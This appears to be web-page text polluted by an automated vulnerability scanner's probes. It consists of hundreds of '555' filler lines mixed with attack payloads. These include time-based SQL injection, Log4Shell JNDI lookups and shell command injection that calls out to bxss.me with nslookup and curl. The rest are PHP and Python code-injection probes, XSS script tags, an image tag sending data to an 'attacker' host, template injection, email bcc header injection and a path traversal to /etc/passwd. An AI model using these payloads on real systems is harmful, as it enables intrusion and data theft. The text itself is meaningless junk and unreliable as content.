555373q37Ot’)) OR 337=(SELECT 337 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555-1); waitfor delay ‘0:0:15’ —
555G6metyp1′; waitfor delay ‘0:0:15’ —
1
555′”
555
555
555
|(nslookup -q=cname hitmucqrkmgek08b6b.bxss.me||curl hitmucqrkmgek08b6b.bxss.me)
555″&&sleep(27*1000)*wisaby&&”
wp-comments-post.php
555
555
555
|(nslookup -q=cname hitluuhiofskoe3a3f.bxss.me||curl hitluuhiofskoe3a3f.bxss.me)
‘.gethostbyname(lc(‘hitxv’.’wjtrapqhaef7d.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(114).chr(88).chr(121).chr(85).’
${@print(md5(31337))}\
555*562*557*0
555
CVSoqIru
h0kKBkwx’; waitfor delay ‘0:0:15’ —
-5 OR 718=(SELECT 718 FROM PG_SLEEP(15))–
-5) OR 320=(SELECT 320 FROM PG_SLEEP(15))–
Y0YoRv77′ OR 81=(SELECT 81 FROM PG_SLEEP(15))–
JTu8CxZV’) OR 263=(SELECT 263 FROM PG_SLEEP(15))–
r75osMhO’)) OR 558=(SELECT 558 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitvoyiukrbqndc8ac${::-.}bxss.me}zzzz${url:UTF-8:http://hitcksbufkfyv.bxss.me/}
555
555
555
555
http://bxss.me/t/xss.html?%00
555
555
555′”()&%fPiy(9345)
555
555
555
555
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitrykujlacea6e2da${::-.}bxss.me}zzzz${url:UTF-8:http://hitfjxqrdukqj.bxss.me/}
555
555
555
555′”()&%TmCG(9876)
|echo ksgdbn$()\ somymq\nz^xyu||a #’ |echo ksgdbn$()\ somymq\nz^xyu||a #|” |echo ksgdbn$()\ somymq\nz^xyu||a #
555*1
555
555*if(now()=sysdate(),sleep(15),0)
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555-1; waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
555NLH1wKHR
555Cd0DlXYh’; waitfor delay ‘0:0:15’ —
555+328-323-5
555*76*71*0
555-1)) OR 890=(SELECT 890 FROM PG_SLEEP(15))–
-1 OR 2+418-418-1=0+0+0+1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
5559m2r0vVs’; waitfor delay ‘0:0:15’ —
555-1 OR 79=(SELECT 79 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5559928173
1}}”}}’}}1%>”%>’%>
dfb{{98991*97996}}xca
${j${::-n}di:dns${::-:}${::-/}${::-/}hitzvhcobxdbx308aa${::-.}bxss.me}zzzz${url:UTF-8:http://hitpyvaduzsuf.bxss.me/}
555<ScRIpT>B9cJ(9960)</sCrIpT>
555
555″ onerror=alert(9135)>
555<a9l7wsX<
555
555
555
555
555
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.965-80432.965.39fef${::-.}1${::-.}bxss.me}}
555
555BVidNFqO
555
555+482-477-5
555*270*265*0
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555kH3z7lUj
555*244*239*0
555*522*517*0
555+420-415-5
555+610-605-5
555-1 waitfor delay ‘0:0:15’ —
5552U8XYfZw’) OR 436=(SELECT 436 FROM PG_SLEEP(15))–
555NLnhjJVY’)) OR 714=(SELECT 714 FROM PG_SLEEP(15))–
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
$(nslookup -q=cname hiteoidvnyqxsa70ce.bxss.me||curl hiteoidvnyqxsa70ce.bxss.me)
5JxxMQ6r
1*555
555
555
‘.print(md5(31337)).’
http://bxss.me/t/xss.html?%00
wp-comments-post.php
xfs.bxss.me
555′”()&%Q2Mh(9248)
‘”()&%Q2Mh(9742)
5559940342
555
<th:t="${dfb}#foreach
555
&nslookup -q=cname hitmorrwpfmuyeb19b.bxss.me&’\”`0&nslookup -q=cname hitmorrwpfmuyeb19b.bxss.me&`’
555
555
http://bxss.me/t/fit.txt
1 waitfor delay ‘0:0:15’ —
1%2527%2522
555
555
5559064241
bfg5642<s1﹥s2ʺs3ʹhjl5642
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
555″ onerror=alert(9115)>
555<img sRc='http://attacker-9569/log.php?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
?'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitcqgwsnwyfp84972${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
555
555
“+response.write(9410994*9385536)+”
to@example.com>
bcc:009365.482-82576.482.1bade.19759.2@bxss.me
555
555
555es4RH5kv
555*1
|(nslookup -q=cname hitrynkpwowdncaf58.bxss.me||curl hitrynkpwowdncaf58.bxss.me)
555*776*771*0
555*if(now()=sysdate(),sleep(15),0)
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
55532BIY51x’; waitfor delay ‘0:0:15’ —
555
555-1)) OR 598=(SELECT 598 FROM PG_SLEEP(15))–
555
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
@@riLNF
555
555
‘”()
555
‘.gethostbyname(lc(‘hitme’.’llqtfjizc1a84.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(100).chr(89).chr(117).chr(81).’
555
555
555
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
“;print(md5(31337));$a=”
${@print(md5(31337))}\
555
555
555
555
555
555
‘+response.write(9897809*9201299)+’
555+902-897-5
555&echo iimvgk$()\ jxvtxc\nz^xyu||a #’ &echo iimvgk$()\ jxvtxc\nz^xyu||a #|” &echo iimvgk$()\ jxvtxc\nz^xyu||a #
(nslookup -q=cname hitygrndgptiz94617.bxss.me||curl hitygrndgptiz94617.bxss.me))
../../../../../../../../../../../../../../etc/passwd
555
555+464-459-5
12345′”\’\”);|]*{
”?
${10000361+10000435}
555
“.gethostbyname(lc(“hitye”.”qbiefbwda0dc4.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(121).chr(70).chr(115).chr(87).”
555s38E2deV’) OR 47=(SELECT 47 FROM PG_SLEEP(15))–
http://bxss.me/t/fit.txt?.jpg
@@dec8K
555
555
555
555
wp-comments-post.php
555
555
xfs.bxss.me
‘”
555
http://bxss.me/t/xss.html?%00
555
555
hitysudgkuggl.bxss.me
555
555′”()&%L9gy(9254)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitzpqieirjvr40934.’+’bxss.me’)
`(nslookup -q=cname hithqahoyicmi031cd.bxss.me||curl hithqahoyicmi031cd.bxss.me)`
“.gethostbyname(lc(“hitec”.”dbosmdpv2fc28.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(101).chr(65).chr(102).chr(77).”
555
555
555
(nslookup -q=cname hitrcmdqzczwpb149e.bxss.me||curl hitrcmdqzczwpb149e.bxss.me))
555
555′”()&%0QqI(9503)
555
555
555
555
555
555
555
555
555
555*1
555+971-966-5
555*262*257*0
555*850*845*0
-1 OR 2+244-244-1=0+0+0+1
-1 OR 3*2>(0+5+244-244)
555kfRhzC7l’ OR 996=(SELECT 996 FROM PG_SLEEP(15))–
555mnx4eNrQ’) OR 744=(SELECT 744 FROM PG_SLEEP(15))–
5556sU38vsz’)) OR 959=(SELECT 959 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555e5gwPqSY’ OR 682=(SELECT 682 FROM PG_SLEEP(15))–
555pqle32jV’) OR 278=(SELECT 278 FROM PG_SLEEP(15))–
555Htr9Boai’)) OR 359=(SELECT 359 FROM PG_SLEEP(15))–
555′”
555
555